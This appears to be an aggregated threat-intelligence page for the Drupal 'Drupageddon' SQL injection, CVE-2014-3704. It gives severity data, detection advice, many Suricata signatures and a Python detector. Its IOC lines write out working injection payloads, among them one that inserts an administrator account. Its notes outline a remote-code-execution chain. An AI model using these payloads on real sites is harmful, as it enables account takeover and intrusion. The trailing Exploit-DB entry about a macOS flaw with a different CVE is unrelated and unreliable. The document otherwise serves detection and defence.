CVE-2014-3704
Published: 2014-10-16
Priority: P1 · 80 · high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Tags: ITW, EXPLOIT, VulnCheck KEV, Initial access
Exploited in the wild
EPSS: 99.97% (100.0th percentile)
The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| drupal | drupal | >= 7.0 < 7.32 | 7.32 |
Detection & IOCs (extracted from sources)
command: UNION SELECT <uid>,'<user>','<pass>','','','',null,0,0,0,1,null,'',0,'',null,<uid>,'<session_id>','','127.0.0.1',0,0,null --
command: name[0 ;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,+MAX(uid)+1,'<user>','<hash>'+FROM+users;insert+into+users_roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name='<user>'),3);;# ]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in
cookie: SESS<sha256(session_name)[0:32]>[test+<UNION SELECT inject with serialized PHP session>]=<session_id>
- Detect HTTP requests to Drupal login endpoints where the 'name' parameter contains array keys with SQL keywords (e.g., UNION SELECT, INSERT INTO, UPDATE users); the SQLi is delivered via crafted array key names in the POST body or cookies.
- Monitor POST requests to /?q=node&destination=node with form_id=user_login_block containing URL-encoded SQL in the name[] parameter keys (e.g., name[0%20;insert+into+users...]).
- Detect HTTP requests carrying cookies where the Drupal session cookie name (SESS<hash>) contains array-style keys with SQL injection payloads (e.g., SESS<hash>[test+UNION SELECT...]).
- Alert on HTTP responses containing the string 'mb_strlen() expects parameter 1 to be string', as this indicates successful exploitation of the Drupageddon SQL injection.
- Detect PHP code injection via Drupal session data: look for session values containing 'wrapper_callback' => 'form_execute_handlers', 'assert', and 'eval(base64_decode(...))' patterns, indicative of the RCE chained exploit.
- Monitor for new Drupal admin account creation or privilege escalation (INSERT INTO users_roles with rid=3) immediately following login form POST requests, which may indicate successful Drupageddon exploitation.
- The Metasploit module drupal_drupageddon uses two methods: form-cache PHP injection (TARGET 0) and user-post injection (TARGET 1). Detect by monitoring for new admin user creation, PHP module enablement, and new posts containing PHP code on Drupal 7.0–7.31 instances.
- Note: the cookie-based exploit (EDB-44355 and EDB-35150) only works against HTTPS URLs, as the session cookie name is derived from the hostname portion after stripping the protocol. HTTP targets use a different attack vector (POST body injection).
- Note: the RCE chained exploit (EDB-35150) uses REPLACE/CHAR SQL functions to smuggle serialized PHP session data containing curly braces past SQL string escaping, meaning detection must account for REPLACE(REPLACE(...,CHAR(125)),CHAR(123)) patterns in the injected payload.
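The request-side and response-side checks from the list above, as an added Python example (not code from the source feeds or from Drupal): it URL-decodes parameter and cookie names once before matching, so the percent-encoding variants that the signature set enumerates one by one reduce to a single test. The function names, the `PLACEHOLDER` sample strings and the choice to flag only bracketed keys that contain non-word characters are assumptions of this example; multipart bodies are not parsed.

```python
import re
from urllib.parse import unquote_plus

# Key of the form name[<subkey>; the closing bracket is optional because a
# raw '=' inside the key truncates it when the pair is split.
# Case-insensitive to mirror the 'nocase' option of the Suricata rules.
NAME_ARRAY_KEY = re.compile(r"^name\[([^\]]*)", re.IGNORECASE)
# Drupal 7 session cookie name (SESS or SSESS + 32 hex chars) used as an array.
SESSION_ARRAY_COOKIE = re.compile(r"^S?SESS[0-9a-f]{32}\[", re.IGNORECASE)
NON_WORD = re.compile(r"\W")
ERROR_MARKER = "mb_strlen() expects parameter 1 to be string"


def suspicious_body_keys(raw_body):
    """Return decoded name[...] keys whose subkey holds non-word characters."""
    findings = []
    for pair in raw_body.split("&"):
        raw_key = pair.split("=", 1)[0]
        key = unquote_plus(raw_key)  # one decode pass, as the server does
        match = NAME_ARRAY_KEY.match(key)
        if match and NON_WORD.search(match.group(1)):
            findings.append(key)
    return findings


def suspicious_cookies(cookie_header):
    """Return decoded session cookie names that carry array-style keys."""
    findings = []
    for part in cookie_header.split(";"):
        name = unquote_plus(part.strip().split("=", 1)[0])
        if SESSION_ARRAY_COOKIE.match(name):
            findings.append(name)
    return findings


def inspect_exchange(request_body="", cookie_header="", response_body=""):
    """Combine the three checks into a list of (alert_type, evidence)."""
    alerts = [("body_array_key", k) for k in suspicious_body_keys(request_body)]
    alerts += [("cookie_array_key", c) for c in suspicious_cookies(cookie_header)]
    if ERROR_MARKER in response_body:
        alerts.append(("response_error_marker", ERROR_MARKER))
    return alerts


# Constructed sample inputs; PLACEHOLDER_SQL stands in for injected SQL.
SAMPLES = {
    "benign_login": "name=alice&pass=secret&form_id=user_login_block&op=Log+in",
    "plain_key": "name[0 ;PLACEHOLDER_SQL;# ]=a&name[0]=b&pass=x"
                 "&form_id=user_login_block",
    "encoded_key": "nam%65%5b0%20%3bPLACEHOLDER_SQL%3b%23%20%5d=a"
                   "&n%61me%5b0%5d=b&pass=x&form_id=user_login_block",
}
SAMPLE_COOKIE = ("has_js=1; "
                 "SESS0123456789abcdef0123456789abcdef[test+PLACEHOLDER]=abc")

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, inspect_exchange(request_body=body))
    print("cookie", inspect_exchange(cookie_header=SAMPLE_COOKIE))
```

A plain `name[0]` key is not flagged by this example, which makes it narrower than the signatures; treat any array-valued `name` on the login form as worth a lower-severity alert if that fits the environment.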
CVSS provenance
nvd: v2.0, 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
osv: 7.5 HIGH
vulncheck: 7.5 HIGH
GHSA
ghsa_unreviewed·2022-05-13
CVE-2014-3704 [HIGH] CWE-89 GHSA-f9cm-c972-9975: The expandArguments function in the database abstraction API in Drupal core 7
OSV
CVE-2014-3704: The expandArguments function in the database abstraction API in Drupal core 7
osv·2014-10-16·CVSS 7.5
VulnCheck
Drupal Drupal Core Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2014·CVSS 7.5
Affected: Drupal Drupal Core
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.greynoise.io/blog/coordinated-cloud-based-scanning-operation-targets-75-known-exposure-points
Exploit PoC: https://vulncheck.com/xdb/497be7626f8c; https://
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 3
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 3"; flow:established,to_server; http.request_body; content:"nam%65["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])nam\%65\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019424; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 29
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 29"; flow:established,to_server; http.request_body; content:"%6e%61%6de["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6e\%61\%6de\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019450; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 10
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 10"; flow:established,to_server; http.request_body; content:"n%61me%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])n\%61me\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019431; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 26
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 26"; flow:established,to_server; http.request_body; content:"%6e%61me%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6e\%61me\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019447; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 7
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 7"; flow:established,to_server; http.request_body; content:"na%6d%65["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])na\%6d\%65\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019428; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 14
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 14"; flow:established,to_server; http.request_body; content:"n%61%6de%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])n\%61\%6de\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019435; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 20
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 20"; flow:established,to_server; http.request_body; content:"%6eam%65%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6eam\%65\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019441; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 24
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 24"; flow:established,to_server; http.request_body; content:"%6ea%6d%65%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6ea\%6d\%65\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019445; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 16
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 16"; flow:established,to_server; http.request_body; content:"n%61%6d%65%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])n\%61\%6d\%65\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019437; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 27
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 27"; flow:established,to_server; http.request_body; content:"%6e%61m%65["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6e\%61m\%65\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019448; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 22
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 22"; flow:established,to_server; http.request_body; content:"%6ea%6de%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6ea\%6de\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019443; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 11
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 11"; flow:established,to_server; http.request_body; content:"n%61m%65["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])n\%61m\%65\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019432; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 4
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 4"; flow:established,to_server; http.request_body; content:"nam%65%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])nam\%65\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019425; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 30
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 30"; flow:established,to_server; http.request_body; content:"%6e%61%6de%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6e\%61\%6de\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019451; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 15
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 15"; flow:established,to_server; http.request_body; content:"n%61%6d%65["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])n\%61\%6d\%65\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019436; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 8
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 8"; flow:established,to_server; http.request_body; content:"na%6d%65%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])na\%6d\%65\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019429; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 19
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 19"; flow:established,to_server; http.request_body; content:"%6eam%65["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6eam\%65\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019440; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 32
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 32"; flow:established,to_server; http.request_body; content:"%6e%61%6d%65%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6e\%61\%6d\%65\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019453; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 9
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 9"; flow:established,to_server; http.request_body; content:"n%61me["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])n\%61me\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019430; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 18
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 18"; flow:established,to_server; http.request_body; content:"%6eame%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6eame\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019439; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 25
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 25"; flow:established,to_server; http.request_body; content:"%6e%61me["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6e\%61me\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019446; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 1
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 1"; flow:established,to_server; http.request_body; content:"name["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])name\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019422; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 5
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 5"; flow:established,to_server; http.request_body; content:"na%6de["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])na\%6de\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019426; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 21
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 21"; flow:established,to_server; http.request_body; content:"%6ea%6de["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6ea\%6de\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019442; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 13
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 13"; flow:established,to_server; http.request_body; content:"n%61%6de["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])n\%61\%6de\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019434; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 17
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 17"; flow:established,to_server; http.request_body; content:"%6eame["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6eame\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019438; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 28
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 28"; flow:established,to_server; http.request_body; content:"%6e%61m%65%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6e\%61m\%65\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019449; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 31
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 31"; flow:established,to_server; http.request_body; content:"%6e%61%6d%65["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6e\%61\%6d\%65\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019452; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 23
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 23"; flow:established,to_server; http.request_body; content:"%6ea%6d%65["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6ea\%6d\%65\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019444; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 2
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 2"; flow:established,to_server; http.request_body; content:"name%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])name\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019423; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 6
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 6"; flow:established,to_server; http.request_body; content:"na%6de%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])na\%6de\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019427; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 12
suricata·2014-10-16·CVSS 7.5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 12"; flow:established,to_server; http.request_body; content:"n%61m%65%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])n\%61m\%65\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019433; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Exploit-DB
Apple Mac OSX - Install.framework suid Helper Privilege Escalation
exploitdb·2015-09-10
CVE-2015-3704 Apple Mac OSX - Install.framework suid Helper Privilege Escalation
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=314
